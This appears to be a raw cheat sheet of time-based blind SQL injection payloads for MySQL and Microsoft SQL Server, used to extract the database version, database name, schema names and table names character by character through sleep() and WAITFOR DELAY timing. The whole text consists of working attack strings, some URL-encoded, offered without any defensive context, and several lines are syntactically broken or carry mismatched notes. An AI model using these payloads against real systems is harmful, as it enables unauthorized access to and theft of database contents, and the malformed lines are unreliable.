AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)-- -
%20AND+IF((SELECT+ascii(substr(version(),1,1)))%20>%2051,sleep(10),NULL)--%20-

%20AND+IF((SELECT+ascii(substr(version(),1,1)))%20=%2053,sleep(10),NULL)--%20-   (length of version is 5)


and if(length(database()) = 5, sleep(10), null)-- -
and if(length(database()) = 5, sleep(10), null)-- -   (length of database 8)
and if(substring(database(),1,1) > 'a', sleep(10), null)-- -
current_user()
table_name()

and if(substr(select schema_name from information_schema.schemata > a, sleep(10), null)-- -

%20AND%20IF(((ascii(len((SELECT%20schema_name%20FROM information_schema.schemata%20LIMIT 0,1),1,1))))%20>%2051,sleep(10),NULL)--%20-

%20AND%20IF(((ascii(substr((SELECT%20schema_name%20FROM information_schema.schemata%20LIMIT 0,1),1,1))))%20>%2095,sleep(10),NULL)--%20-


Microsoft SQL injection blind database dump
'WAITFOR DELAY '0:0:10'

'%20waitfor%20delay'0%3a0%3a25'--

MS sql DB

DB Length= 'IF(LEN(DB_NAME()))+>+1+WAITFOR+DELAY+'00:00:10'--

DB Name= 'IF(SUBSTRING(DB_NAME(),1,1))+>+'a'+WAITFOR+DELAY+'00:00:10'--

Table Length= 'IF(LEN((SELECT+TOP+1+NAME+FROM+sysobjects+WHERE+xtype='U'))+>+1)+WAITFOR+DELAY+'00:00:10'--

Table Name= 'IF(SUBSTRING((SELECT+TOP+1+NAME+FROM+sysobjects+WHERE+xtype='U'),1,1))+>+'a'+WAITFOR+DELAY+'00:00:10'--
